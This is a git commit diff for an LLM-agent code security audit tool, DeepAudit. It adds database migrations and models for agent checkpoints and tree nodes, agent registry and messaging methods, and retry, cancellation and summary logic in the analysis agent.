feat(agent): implement comprehensive agent architecture with knowledge base and persistence layer
- Add database migrations for agent checkpoints and tree node tracking - Implement core agent execution framework with executor, state management, and message handling - Create knowledge base system with framework-specific modules (Django, FastAPI, Flask, Express, React, Supabase) - Add vulnerability knowledge modules covering authentication, cryptography, injection, XSS, XXE, SSRF, path traversal, deserialization, and race conditions - Introduce new agent tools: thinking tool, reporting tool, and agent-specific utilities - Implement LLM memory compression and prompt caching for improved performance - Add agent registry and persistence layer for checkpoint management - Refactor agent implementations (analysis, recon, verification, orchestrator) with enhanced capabilities - Remove legacy agent implementations (analysis_v2, react_agent) - Update API endpoints for agent task creation and project management - Add frontend components for agent task creation and enhanced audit UI - Consolidate agent service architecture with improved separation of concerns - This refactoring provides a scalable foundation for multi-agent collaboration with knowledge-driven decision making and state persistence
This commit is contained in:
parent
147dfbaf5e
commit
f05c0073e1
|
|
@ -0,0 +1,68 @@
|
|||
"""Add agent checkpoint and tree node tables
|
||||
|
||||
Revision ID: 007_add_agent_checkpoint_tables
|
||||
Revises: 006_add_agent_tables
|
||||
Create Date: 2024-12-12
|
||||
|
||||
"""
|
||||
from alembic import op
|
||||
import sqlalchemy as sa
|
||||
|
||||
|
||||
# revision identifiers, used by Alembic.
|
||||
revision = '007_add_agent_checkpoint_tables'
|
||||
down_revision = '006_add_agent_tables'
|
||||
branch_labels = None
|
||||
depends_on = None
|
||||
|
||||
|
||||
def upgrade() -> None:
    """Create the ``agent_checkpoints`` and ``agent_tree_nodes`` tables.

    Both tables carry a ``task_id`` foreign key to ``agent_tasks.id`` declared
    with ``ondelete='CASCADE'``.
    """
    # NOTE(review): the ``default=`` arguments below are SQLAlchemy client-side
    # (Python) defaults; presumably they emit no DEFAULT clause in the generated
    # DDL (only ``server_default`` does) -- confirm that all writers go through
    # the ORM models, which declare the same defaults.

    # Create agent_checkpoints table
    op.create_table(
        'agent_checkpoints',
        sa.Column('id', sa.String(36), primary_key=True),
        sa.Column('task_id', sa.String(36), sa.ForeignKey('agent_tasks.id', ondelete='CASCADE'), nullable=False, index=True),
        sa.Column('agent_id', sa.String(50), nullable=False, index=True),
        sa.Column('agent_name', sa.String(255), nullable=False),
        sa.Column('agent_type', sa.String(50), nullable=False),
        sa.Column('parent_agent_id', sa.String(50), nullable=True),
        sa.Column('state_data', sa.Text, nullable=False),
        sa.Column('iteration', sa.Integer, default=0),
        sa.Column('status', sa.String(30), nullable=False),
        sa.Column('total_tokens', sa.Integer, default=0),
        sa.Column('tool_calls', sa.Integer, default=0),
        sa.Column('findings_count', sa.Integer, default=0),
        sa.Column('checkpoint_type', sa.String(30), default='auto'),
        sa.Column('checkpoint_name', sa.String(255), nullable=True),
        sa.Column('checkpoint_metadata', sa.JSON, nullable=True),
        sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.func.now(), index=True),
    )

    # Create agent_tree_nodes table
    op.create_table(
        'agent_tree_nodes',
        sa.Column('id', sa.String(36), primary_key=True),
        sa.Column('task_id', sa.String(36), sa.ForeignKey('agent_tasks.id', ondelete='CASCADE'), nullable=False, index=True),
        sa.Column('agent_id', sa.String(50), nullable=False, unique=True, index=True),
        sa.Column('agent_name', sa.String(255), nullable=False),
        sa.Column('agent_type', sa.String(50), nullable=False),
        sa.Column('parent_agent_id', sa.String(50), nullable=True, index=True),
        sa.Column('depth', sa.Integer, default=0),
        sa.Column('task_description', sa.Text, nullable=True),
        sa.Column('knowledge_modules', sa.JSON, nullable=True),
        sa.Column('status', sa.String(30), default='created'),
        sa.Column('result_summary', sa.Text, nullable=True),
        sa.Column('findings_count', sa.Integer, default=0),
        sa.Column('iterations', sa.Integer, default=0),
        sa.Column('tokens_used', sa.Integer, default=0),
        sa.Column('tool_calls', sa.Integer, default=0),
        sa.Column('duration_ms', sa.Integer, nullable=True),
        sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.func.now()),
        sa.Column('started_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('finished_at', sa.DateTime(timezone=True), nullable=True),
    )
|
||||
|
||||
|
||||
def downgrade() -> None:
    """Drop the ``agent_tree_nodes`` and ``agent_checkpoints`` tables."""
    op.drop_table('agent_tree_nodes')
    op.drop_table('agent_checkpoints')
|
||||
|
|
@ -0,0 +1,29 @@
|
|||
"""merge_heads
|
||||
|
||||
Revision ID: 4c280754c680
|
||||
Revises: 004_add_prompts_and_rules, 007_add_agent_checkpoint_tables
|
||||
Create Date: 2025-12-12 12:07:42.238185
|
||||
|
||||
"""
|
||||
from alembic import op
|
||||
import sqlalchemy as sa
|
||||
|
||||
|
||||
# revision identifiers, used by Alembic.
|
||||
revision = '4c280754c680'
|
||||
down_revision = ('004_add_prompts_and_rules', '007_add_agent_checkpoint_tables')
|
||||
branch_labels = None
|
||||
depends_on = None
|
||||
|
||||
|
||||
def upgrade() -> None:
    """No-op: this revision only merges two migration heads (see ``down_revision``)."""
    pass
|
||||
|
||||
|
||||
def downgrade() -> None:
    """No-op: the merge revision made no schema changes to revert."""
    pass
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
|
|
@ -676,15 +676,26 @@ async def get_project_branches(
|
|||
|
||||
repo_type = project.repository_type or "other"
|
||||
|
||||
# 详细日志
|
||||
print(f"[Branch] 项目: {project.name}, 类型: {repo_type}, URL: {project.repository_url}")
|
||||
print(f"[Branch] GitHub Token: {'已配置' if github_token else '未配置'}, GitLab Token: {'已配置' if gitlab_token else '未配置'}")
|
||||
|
||||
try:
|
||||
if repo_type == "github":
|
||||
if not github_token:
|
||||
print("[Branch] 警告: GitHub Token 未配置,可能会遇到 API 限制")
|
||||
branches = await get_github_branches(project.repository_url, github_token)
|
||||
elif repo_type == "gitlab":
|
||||
if not gitlab_token:
|
||||
print("[Branch] 警告: GitLab Token 未配置,可能无法访问私有仓库")
|
||||
branches = await get_gitlab_branches(project.repository_url, gitlab_token)
|
||||
else:
|
||||
# 对于其他类型,返回默认分支
|
||||
print(f"[Branch] 仓库类型 '{repo_type}' 不支持获取分支,返回默认分支")
|
||||
branches = [project.default_branch or "main"]
|
||||
|
||||
print(f"[Branch] 成功获取 {len(branches)} 个分支")
|
||||
|
||||
# 将默认分支放在第一位
|
||||
default_branch = project.default_branch or "main"
|
||||
if default_branch in branches:
|
||||
|
|
@ -694,7 +705,8 @@ async def get_project_branches(
|
|||
return {"branches": branches, "default_branch": default_branch}
|
||||
|
||||
except Exception as e:
|
||||
print(f"获取分支列表失败: {e}")
|
||||
error_msg = str(e)
|
||||
print(f"[Branch] 获取分支列表失败: {error_msg}")
|
||||
# 返回默认分支作为后备
|
||||
return {
|
||||
"branches": [project.default_branch or "main"],
|
||||
|
|
|
|||
|
|
@ -442,3 +442,141 @@ class AgentFinding(Base):
|
|||
"ai_confidence": self.ai_confidence,
|
||||
"created_at": self.created_at.isoformat() if self.created_at else None,
|
||||
}
|
||||
|
||||
|
||||
class AgentCheckpoint(Base):
    """
    Agent checkpoint.

    Persists agent state in order to support:
    - task resumption
    - state rollback
    - execution-history tracking
    """
    __tablename__ = "agent_checkpoints"

    id = Column(String(36), primary_key=True, default=lambda: str(uuid.uuid4()))
    task_id = Column(String(36), ForeignKey("agent_tasks.id", ondelete="CASCADE"), nullable=False, index=True)

    # Agent identity
    agent_id = Column(String(50), nullable=False, index=True)
    agent_name = Column(String(255), nullable=False)
    agent_type = Column(String(50), nullable=False)
    parent_agent_id = Column(String(50), nullable=True)

    # State payload (JSON-serialized AgentState)
    state_data = Column(Text, nullable=False)

    # Execution state
    iteration = Column(Integer, default=0)
    status = Column(String(30), nullable=False)

    # Statistics
    total_tokens = Column(Integer, default=0)
    tool_calls = Column(Integer, default=0)
    findings_count = Column(Integer, default=0)

    # Checkpoint kind
    checkpoint_type = Column(String(30), default="auto")  # auto, manual, error, final
    checkpoint_name = Column(String(255), nullable=True)

    # Free-form metadata
    checkpoint_metadata = Column(JSON, nullable=True)

    # Timestamp
    created_at = Column(DateTime(timezone=True), server_default=func.now(), index=True)

    def __repr__(self):
        return f"<AgentCheckpoint {self.agent_id} - iter {self.iteration}>"

    def to_dict(self) -> dict:
        """Convert the checkpoint to a plain dict.

        ``created_at`` is rendered with ``isoformat()`` (``None`` when unset).
        """
        # NOTE(review): ``state_data`` and ``checkpoint_metadata`` are not part
        # of the returned dict -- confirm the omission is intentional.
        return {
            "id": self.id,
            "task_id": self.task_id,
            "agent_id": self.agent_id,
            "agent_name": self.agent_name,
            "agent_type": self.agent_type,
            "parent_agent_id": self.parent_agent_id,
            "iteration": self.iteration,
            "status": self.status,
            "total_tokens": self.total_tokens,
            "tool_calls": self.tool_calls,
            "findings_count": self.findings_count,
            "checkpoint_type": self.checkpoint_type,
            "checkpoint_name": self.checkpoint_name,
            "created_at": self.created_at.isoformat() if self.created_at else None,
        }
|
||||
|
||||
|
||||
class AgentTreeNode(Base):
    """
    Agent tree node.

    Records the structure of the dynamic agent tree, used for:
    - visualizing the agent tree
    - tracking relationships between agents
    - analyzing the execution flow
    """
    __tablename__ = "agent_tree_nodes"

    id = Column(String(36), primary_key=True, default=lambda: str(uuid.uuid4()))
    task_id = Column(String(36), ForeignKey("agent_tasks.id", ondelete="CASCADE"), nullable=False, index=True)

    # Agent identity
    agent_id = Column(String(50), nullable=False, unique=True, index=True)
    agent_name = Column(String(255), nullable=False)
    agent_type = Column(String(50), nullable=False)

    # Tree structure
    parent_agent_id = Column(String(50), nullable=True, index=True)
    depth = Column(Integer, default=0)  # depth in the tree

    # Task information
    task_description = Column(Text, nullable=True)
    knowledge_modules = Column(JSON, nullable=True)

    # Execution state
    status = Column(String(30), default="created")

    # Execution result
    result_summary = Column(Text, nullable=True)
    findings_count = Column(Integer, default=0)

    # Statistics
    iterations = Column(Integer, default=0)
    tokens_used = Column(Integer, default=0)
    tool_calls = Column(Integer, default=0)
    duration_ms = Column(Integer, nullable=True)

    # Timestamps
    created_at = Column(DateTime(timezone=True), server_default=func.now())
    started_at = Column(DateTime(timezone=True), nullable=True)
    finished_at = Column(DateTime(timezone=True), nullable=True)

    def __repr__(self):
        return f"<AgentTreeNode {self.agent_name} ({self.agent_id})>"

    def to_dict(self) -> dict:
        """Convert the node to a plain dict.

        The three timestamp fields are rendered with ``isoformat()`` and are
        ``None`` when unset.
        """
        return {
            "id": self.id,
            "task_id": self.task_id,
            "agent_id": self.agent_id,
            "agent_name": self.agent_name,
            "agent_type": self.agent_type,
            "parent_agent_id": self.parent_agent_id,
            "depth": self.depth,
            "task_description": self.task_description,
            "knowledge_modules": self.knowledge_modules,
            "status": self.status,
            "result_summary": self.result_summary,
            "findings_count": self.findings_count,
            "iterations": self.iterations,
            "tokens_used": self.tokens_used,
            "tool_calls": self.tool_calls,
            "duration_ms": self.duration_ms,
            "created_at": self.created_at.isoformat() if self.created_at else None,
            "started_at": self.started_at.isoformat() if self.started_at else None,
            "finished_at": self.finished_at.isoformat() if self.finished_at else None,
        }
|
||||
|
|
|
|||
|
|
@ -2,16 +2,17 @@
|
|||
DeepAudit Agent 服务模块
|
||||
基于 LangGraph 的 AI Agent 代码安全审计
|
||||
|
||||
架构:
|
||||
LangGraph 状态图工作流
|
||||
架构升级版本 - 支持:
|
||||
- 动态Agent树结构
|
||||
- 专业知识模块系统
|
||||
- Agent间通信机制
|
||||
- 完整状态管理
|
||||
- Think工具和漏洞报告工具
|
||||
|
||||
工作流:
|
||||
START → Recon → Analysis ⟲ → Verification → Report → END
|
||||
|
||||
节点:
|
||||
- Recon: 信息收集 (项目结构、技术栈、入口点)
|
||||
- Analysis: 漏洞分析 (静态分析、RAG、模式匹配)
|
||||
- Verification: 漏洞验证 (LLM 验证、沙箱测试)
|
||||
- Report: 报告生成
|
||||
支持动态创建子Agent进行专业化分析
|
||||
"""
|
||||
|
||||
# 从 graph 模块导入主要组件
|
||||
|
|
@ -32,6 +33,29 @@ from .agents import (
|
|||
OrchestratorAgent, ReconAgent, AnalysisAgent, VerificationAgent,
|
||||
)
|
||||
|
||||
# 🔥 新增:核心模块(状态管理、注册表、消息)
|
||||
from .core import (
|
||||
AgentState, AgentStatus,
|
||||
AgentRegistry, agent_registry,
|
||||
AgentMessage, MessageType, MessagePriority, MessageBus,
|
||||
)
|
||||
|
||||
# 🔥 新增:知识模块系统(基于RAG)
|
||||
from .knowledge import (
|
||||
KnowledgeLoader, knowledge_loader,
|
||||
get_available_modules, get_module_content,
|
||||
SecurityKnowledgeRAG, security_knowledge_rag,
|
||||
SecurityKnowledgeQueryTool, GetVulnerabilityKnowledgeTool,
|
||||
)
|
||||
|
||||
# 🔥 新增:协作工具
|
||||
from .tools import (
|
||||
ThinkTool, ReflectTool,
|
||||
CreateVulnerabilityReportTool,
|
||||
CreateSubAgentTool, SendMessageTool, ViewAgentGraphTool,
|
||||
WaitForMessageTool, AgentFinishTool,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
# 核心 Runner
|
||||
"AgentRunner",
|
||||
|
|
@ -54,5 +78,35 @@ __all__ = [
|
|||
"ReconAgent",
|
||||
"AnalysisAgent",
|
||||
"VerificationAgent",
|
||||
|
||||
# 🔥 核心模块
|
||||
"AgentState",
|
||||
"AgentStatus",
|
||||
"AgentRegistry",
|
||||
"agent_registry",
|
||||
"AgentMessage",
|
||||
"MessageType",
|
||||
"MessagePriority",
|
||||
"MessageBus",
|
||||
|
||||
# 🔥 知识模块(基于RAG)
|
||||
"KnowledgeLoader",
|
||||
"knowledge_loader",
|
||||
"get_available_modules",
|
||||
"get_module_content",
|
||||
"SecurityKnowledgeRAG",
|
||||
"security_knowledge_rag",
|
||||
"SecurityKnowledgeQueryTool",
|
||||
"GetVulnerabilityKnowledgeTool",
|
||||
|
||||
# 🔥 协作工具
|
||||
"ThinkTool",
|
||||
"ReflectTool",
|
||||
"CreateVulnerabilityReportTool",
|
||||
"CreateSubAgentTool",
|
||||
"SendMessageTool",
|
||||
"ViewAgentGraphTool",
|
||||
"WaitForMessageTool",
|
||||
"AgentFinishTool",
|
||||
]
|
||||
|
||||
|
|
|
|||
|
|
@ -46,8 +46,6 @@ ANALYSIS_SYSTEM_PROMPT = """你是 DeepAudit 的漏洞分析 Agent,一个**自
|
|||
### 深度分析
|
||||
- **pattern_match**: 危险模式匹配
|
||||
参数: pattern (str), file_types (list)
|
||||
- **code_analysis**: LLM 深度代码分析 ⭐
|
||||
参数: code (str), file_path (str), focus (str)
|
||||
- **dataflow_analysis**: 数据流追踪
|
||||
参数: source (str), sink (str)
|
||||
|
||||
|
|
@ -114,7 +112,7 @@ Final Answer: [JSON 格式的漏洞报告]
|
|||
|
||||
## 分析策略建议
|
||||
1. **快速扫描**: 先用 semgrep_scan 获得概览
|
||||
2. **重点深入**: 对可疑文件使用 read_file + code_analysis
|
||||
2. **重点深入**: 对可疑文件使用 read_file + pattern_match
|
||||
3. **模式搜索**: 用 search_code 找危险模式 (eval, exec, query 等)
|
||||
4. **语义搜索**: 用 RAG 找相似的漏洞模式
|
||||
5. **数据流**: 用 dataflow_analysis 追踪用户输入
|
||||
|
|
@ -268,6 +266,9 @@ class AnalysisAgent(BaseAgent):
|
|||
# 🔥 构建包含交接上下文的初始消息
|
||||
handoff_context = self.get_handoff_context()
|
||||
|
||||
# 🔥 获取目标文件列表
|
||||
target_files = config.get("target_files", [])
|
||||
|
||||
initial_message = f"""请开始对项目进行安全漏洞分析。
|
||||
|
||||
## 项目信息
|
||||
|
|
@ -275,7 +276,22 @@ class AnalysisAgent(BaseAgent):
|
|||
- 语言: {tech_stack.get('languages', [])}
|
||||
- 框架: {tech_stack.get('frameworks', [])}
|
||||
|
||||
{handoff_context if handoff_context else f'''## 上下文信息
|
||||
"""
|
||||
# 🔥 如果指定了目标文件,明确告知 Agent
|
||||
if target_files:
|
||||
initial_message += f"""## ⚠️ 审计范围
|
||||
用户指定了 {len(target_files)} 个目标文件进行审计:
|
||||
"""
|
||||
for tf in target_files[:10]:
|
||||
initial_message += f"- {tf}\n"
|
||||
if len(target_files) > 10:
|
||||
initial_message += f"- ... 还有 {len(target_files) - 10} 个文件\n"
|
||||
initial_message += """
|
||||
请直接分析这些指定的文件,不要分析其他文件。
|
||||
|
||||
"""
|
||||
|
||||
initial_message += f"""{handoff_context if handoff_context else f'''## 上下文信息
|
||||
### 高风险区域
|
||||
{json.dumps(high_risk_areas[:20], ensure_ascii=False)}
|
||||
|
||||
|
|
@ -307,6 +323,7 @@ class AnalysisAgent(BaseAgent):
|
|||
|
||||
self._steps = []
|
||||
all_findings = []
|
||||
error_message = None # 🔥 跟踪错误信息
|
||||
|
||||
await self.emit_thinking("🔬 Analysis Agent 启动,LLM 开始自主安全分析...")
|
||||
|
||||
|
|
@ -323,11 +340,12 @@ class AnalysisAgent(BaseAgent):
|
|||
break
|
||||
|
||||
# 调用 LLM 进行思考和决策(流式输出)
|
||||
# 🔥 增加 max_tokens 到 4096,避免长输出被截断
|
||||
try:
|
||||
llm_output, tokens_this_round = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=2048,
|
||||
max_tokens=4096,
|
||||
)
|
||||
except asyncio.CancelledError:
|
||||
logger.info(f"[{self.name}] LLM call cancelled")
|
||||
|
|
@ -338,13 +356,22 @@ class AnalysisAgent(BaseAgent):
|
|||
# 🔥 Handle empty LLM response to prevent loops
|
||||
if not llm_output or not llm_output.strip():
|
||||
logger.warning(f"[{self.name}] Empty LLM response in iteration {self._iteration}")
|
||||
await self.emit_llm_decision("收到空响应", "LLM 返回内容为空,尝试重试通过提示")
|
||||
empty_retry_count = getattr(self, '_empty_retry_count', 0) + 1
|
||||
self._empty_retry_count = empty_retry_count
|
||||
if empty_retry_count >= 3:
|
||||
logger.error(f"[{self.name}] Too many empty responses, stopping")
|
||||
error_message = "连续收到空响应,停止分析"
|
||||
await self.emit_event("error", error_message)
|
||||
break
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": "Received empty response. Please output your Thought and Action.",
|
||||
})
|
||||
continue
|
||||
|
||||
# 重置空响应计数器
|
||||
self._empty_retry_count = 0
|
||||
|
||||
# 解析 LLM 响应
|
||||
step = self._parse_llm_response(llm_output)
|
||||
self._steps.append(step)
|
||||
|
|
@ -396,6 +423,11 @@ class AnalysisAgent(BaseAgent):
|
|||
step.action_input or {}
|
||||
)
|
||||
|
||||
# 🔥 工具执行后检查取消状态
|
||||
if self.is_cancelled:
|
||||
logger.info(f"[{self.name}] Cancelled after tool execution")
|
||||
break
|
||||
|
||||
step.observation = observation
|
||||
|
||||
# 🔥 发射 LLM 观察事件
|
||||
|
|
@ -414,9 +446,96 @@ class AnalysisAgent(BaseAgent):
|
|||
"content": "请继续分析。选择一个工具执行,或者如果分析完成,输出 Final Answer 汇总所有发现。",
|
||||
})
|
||||
|
||||
# 🔥 如果循环结束但没有发现,强制 LLM 总结
|
||||
if not all_findings and not self.is_cancelled and not error_message:
|
||||
await self.emit_thinking("📝 分析阶段结束,正在生成漏洞总结...")
|
||||
|
||||
# 添加强制总结的提示
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": """分析阶段已结束。请立即输出 Final Answer,总结你发现的所有安全问题。
|
||||
|
||||
即使没有发现严重漏洞,也请总结你的分析过程和观察到的潜在风险点。
|
||||
|
||||
请按以下 JSON 格式输出:
|
||||
```json
|
||||
{
|
||||
"findings": [
|
||||
{
|
||||
"vulnerability_type": "sql_injection|xss|command_injection|path_traversal|ssrf|hardcoded_secret|other",
|
||||
"severity": "critical|high|medium|low",
|
||||
"title": "漏洞标题",
|
||||
"description": "详细描述",
|
||||
"file_path": "文件路径",
|
||||
"line_start": 行号,
|
||||
"code_snippet": "相关代码片段",
|
||||
"suggestion": "修复建议"
|
||||
}
|
||||
],
|
||||
"summary": "分析总结"
|
||||
}
|
||||
```
|
||||
|
||||
Final Answer:""",
|
||||
})
|
||||
|
||||
try:
|
||||
summary_output, _ = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=4096,
|
||||
)
|
||||
|
||||
if summary_output and summary_output.strip():
|
||||
# 解析总结输出
|
||||
import re
|
||||
summary_text = summary_output.strip()
|
||||
summary_text = re.sub(r'```json\s*', '', summary_text)
|
||||
summary_text = re.sub(r'```\s*', '', summary_text)
|
||||
parsed_result = AgentJsonParser.parse(
|
||||
summary_text,
|
||||
default={"findings": [], "summary": ""}
|
||||
)
|
||||
if "findings" in parsed_result:
|
||||
all_findings = parsed_result["findings"]
|
||||
except Exception as e:
|
||||
logger.warning(f"[{self.name}] Failed to generate summary: {e}")
|
||||
|
||||
# 处理结果
|
||||
duration_ms = int((time.time() - start_time) * 1000)
|
||||
|
||||
# 🔥 如果被取消,返回取消结果
|
||||
if self.is_cancelled:
|
||||
await self.emit_event(
|
||||
"info",
|
||||
f"🛑 Analysis Agent 已取消: {len(all_findings)} 个发现, {self._iteration} 轮迭代"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error="任务已取消",
|
||||
data={"findings": all_findings},
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 🔥 如果有错误,返回失败结果
|
||||
if error_message:
|
||||
await self.emit_event(
|
||||
"error",
|
||||
f"❌ Analysis Agent 失败: {error_message}"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error=error_message,
|
||||
data={"findings": all_findings},
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 标准化发现
|
||||
standardized_findings = []
|
||||
for finding in all_findings:
|
||||
|
|
|
|||
|
|
@ -6,6 +6,8 @@ Agent 基类
|
|||
1. LLM 是 Agent 的大脑,全程参与决策
|
||||
2. Agent 之间通过 TaskHandoff 传递结构化上下文
|
||||
3. 事件分为流式事件(前端展示)和持久化事件(数据库记录)
|
||||
4. 支持动态Agent树和专业知识模块
|
||||
5. 完整的状态管理和Agent间通信
|
||||
"""
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
|
|
@ -17,6 +19,10 @@ import asyncio
|
|||
import logging
|
||||
import uuid
|
||||
|
||||
from ..core.state import AgentState, AgentStatus
|
||||
from ..core.registry import agent_registry
|
||||
from ..core.message import message_bus, MessageType, AgentMessage
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
|
|
@ -238,6 +244,11 @@ class BaseAgent(ABC):
|
|||
1. 通过 TaskHandoff 接收前序 Agent 的上下文
|
||||
2. 执行完成后生成 TaskHandoff 传递给下一个 Agent
|
||||
3. 洞察和发现应该结构化记录
|
||||
|
||||
动态Agent树:
|
||||
1. 支持动态创建子Agent
|
||||
2. Agent间通过消息总线通信
|
||||
3. 完整的状态管理和生命周期
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
|
|
@ -246,6 +257,8 @@ class BaseAgent(ABC):
|
|||
llm_service,
|
||||
tools: Dict[str, Any],
|
||||
event_emitter=None,
|
||||
parent_id: Optional[str] = None,
|
||||
knowledge_modules: Optional[List[str]] = None,
|
||||
):
|
||||
"""
|
||||
初始化 Agent
|
||||
|
|
@ -255,13 +268,30 @@ class BaseAgent(ABC):
|
|||
llm_service: LLM 服务
|
||||
tools: 可用工具字典
|
||||
event_emitter: 事件发射器
|
||||
parent_id: 父Agent ID(用于动态Agent树)
|
||||
knowledge_modules: 要加载的知识模块
|
||||
"""
|
||||
self.config = config
|
||||
self.llm_service = llm_service
|
||||
self.tools = tools
|
||||
self.event_emitter = event_emitter
|
||||
self.parent_id = parent_id
|
||||
self.knowledge_modules = knowledge_modules or []
|
||||
|
||||
# 运行状态
|
||||
# 🔥 生成唯一ID
|
||||
self._agent_id = f"agent_{uuid.uuid4().hex[:8]}"
|
||||
|
||||
# 🔥 增强的状态管理
|
||||
self._state = AgentState(
|
||||
agent_id=self._agent_id,
|
||||
agent_name=config.name,
|
||||
agent_type=config.agent_type.value,
|
||||
parent_id=parent_id,
|
||||
max_iterations=config.max_iterations,
|
||||
knowledge_modules=self.knowledge_modules,
|
||||
)
|
||||
|
||||
# 运行状态(保持向后兼容)
|
||||
self._iteration = 0
|
||||
self._total_tokens = 0
|
||||
self._tool_calls = 0
|
||||
|
|
@ -272,14 +302,170 @@ class BaseAgent(ABC):
|
|||
self._insights: List[str] = [] # 收集的洞察
|
||||
self._work_completed: List[str] = [] # 完成的工作记录
|
||||
|
||||
# 🔥 是否已注册到注册表
|
||||
self._registered = False
|
||||
|
||||
# 🔥 加载知识模块到系统提示词
|
||||
if self.knowledge_modules:
|
||||
self._load_knowledge_modules()
|
||||
|
||||
def _register_to_registry(self, task: Optional[str] = None) -> None:
    """Register this agent with the agent registry (deferred; called at run time).

    Does nothing beyond logging when the agent is already registered.
    Otherwise registers the agent, creates its message queue on the message
    bus, marks it as registered and logs the current tree node count.

    Args:
        task: Task label stored in the registry. Falls back to the state's
            ``task`` and then to ``"Initializing"`` when falsy.
    """
    logger.info(f"[AgentTree] _register_to_registry 被调用: {self.config.name} (id={self._agent_id}, parent={self.parent_id}, _registered={self._registered})")

    if not self._registered:
        logger.info(f"[AgentTree] 正在注册 Agent: {self.config.name} (id={self._agent_id}, parent={self.parent_id})")

        agent_registry.register_agent(
            agent_id=self._agent_id,
            agent_name=self.config.name,
            agent_type=self.config.agent_type.value,
            task=task or self._state.task or "Initializing",
            parent_id=self.parent_id,
            agent_instance=self,
            state=self._state,
            knowledge_modules=self.knowledge_modules,
        )

        # The agent needs its own queue before it is flagged as registered.
        message_bus.create_queue(self._agent_id)
        self._registered = True

        tree = agent_registry.get_agent_tree()
        logger.info(f"[AgentTree] Agent 注册完成: {self.config.name}, 当前树节点数: {len(tree['nodes'])}")
    else:
        logger.warning(f"[AgentTree] {self.config.name} 已注册,跳过 (id={self._agent_id})")
|
||||
|
||||
def set_parent_id(self, parent_id: str) -> None:
    """Set the parent agent ID (called at dispatch time).

    The value is stored both on the agent and on its state object.
    """
    self.parent_id = self._state.parent_id = parent_id
|
||||
|
||||
def _load_knowledge_modules(self) -> None:
|
||||
"""加载知识模块到系统提示词"""
|
||||
if not self.knowledge_modules:
|
||||
return
|
||||
|
||||
try:
|
||||
from ..knowledge import knowledge_loader
|
||||
|
||||
enhanced_prompt = knowledge_loader.build_system_prompt_with_modules(
|
||||
self.config.system_prompt or "",
|
||||
self.knowledge_modules,
|
||||
)
|
||||
self.config.system_prompt = enhanced_prompt
|
||||
|
||||
logger.info(f"[{self.name}] Loaded knowledge modules: {self.knowledge_modules}")
|
||||
except Exception as e:
|
||||
logger.warning(f"Failed to load knowledge modules: {e}")
|
||||
|
||||
@property
def name(self) -> str:
    """Agent name, read from ``self.config.name``."""
    return self.config.name
|
||||
|
||||
@property
def agent_id(self) -> str:
    """Identifier of this agent instance (``self._agent_id``)."""
    return self._agent_id
|
||||
|
||||
@property
def state(self) -> AgentState:
    """The ``AgentState`` object held by this agent."""
    return self._state
|
||||
|
||||
@property
def agent_type(self) -> AgentType:
    """Agent type, read from ``self.config.agent_type``."""
    return self.config.agent_type
|
||||
|
||||
# ============ Agent间消息处理 ============
|
||||
|
||||
def check_messages(self) -> List[AgentMessage]:
    """
    Fetch unread messages for this agent and fold them into its state.

    Each message is appended to the state's history under the "user" role:
    messages from "user" verbatim, messages from other agents in their XML
    form. If the state is waiting for input, it is resumed and the registry
    status is set to "running".

    Returns:
        The list of unread messages that were fetched (marked as read).
    """
    unread = message_bus.get_messages(
        self._agent_id,
        unread_only=True,
        mark_as_read=True,
    )

    for incoming in unread:
        # User messages go in as-is; agent-to-agent messages use the XML form.
        payload = incoming.content if incoming.from_agent == "user" else incoming.to_xml()
        self._state.add_message("user", payload)

        # A waiting agent resumes as soon as a message arrives.
        if self._state.is_waiting_for_input():
            self._state.resume_from_waiting()
            agent_registry.update_agent_status(self._agent_id, "running")

    return unread
|
||||
|
||||
def has_pending_messages(self) -> bool:
    """Return whether the message bus reports unread messages for this agent."""
    return message_bus.has_unread_messages(self._agent_id)
|
||||
|
||||
def send_message_to_parent(
    self,
    content: str,
    message_type: MessageType = MessageType.INFORMATION,
) -> None:
    """Send a message to the parent agent; a no-op when there is no parent.

    Args:
        content: Message body.
        message_type: Message category forwarded to the message bus.
    """
    if not self.parent_id:
        return

    message_bus.send_message(
        from_agent=self._agent_id,
        to_agent=self.parent_id,
        content=content,
        message_type=message_type,
    )
|
||||
|
||||
def send_message_to_agent(
    self,
    target_id: str,
    content: str,
    message_type: MessageType = MessageType.INFORMATION,
) -> None:
    """Send a message to the agent identified by ``target_id``.

    Args:
        target_id: ID of the receiving agent.
        content: Message body.
        message_type: Message category forwarded to the message bus.
    """
    message_bus.send_message(
        from_agent=self._agent_id,
        to_agent=target_id,
        content=content,
        message_type=message_type,
    )
|
||||
|
||||
# ============ 生命周期管理 ============
|
||||
|
||||
def on_start(self) -> None:
    """Lifecycle hook: start the state and set the registry status to "running"."""
    self._state.start()
    agent_registry.update_agent_status(self._agent_id, "running")
|
||||
|
||||
def on_complete(self, result: Dict[str, Any]) -> None:
    """Lifecycle hook called when the agent completes.

    Marks the state as completed, sets the registry status to "completed"
    and, when a parent agent exists, sends it a completion report.

    Args:
        result: Result dict; its "summary" and "findings" entries (when
            present) are forwarded in the completion report.
    """
    self._state.set_completed(result)
    agent_registry.update_agent_status(self._agent_id, "completed", result)

    # Only agents with a parent have someone to report to.
    if not self.parent_id:
        return

    message_bus.send_completion_report(
        from_agent=self._agent_id,
        to_agent=self.parent_id,
        summary=result.get("summary", "Task completed"),
        findings=result.get("findings", []),
        success=True,
    )
|
||||
|
||||
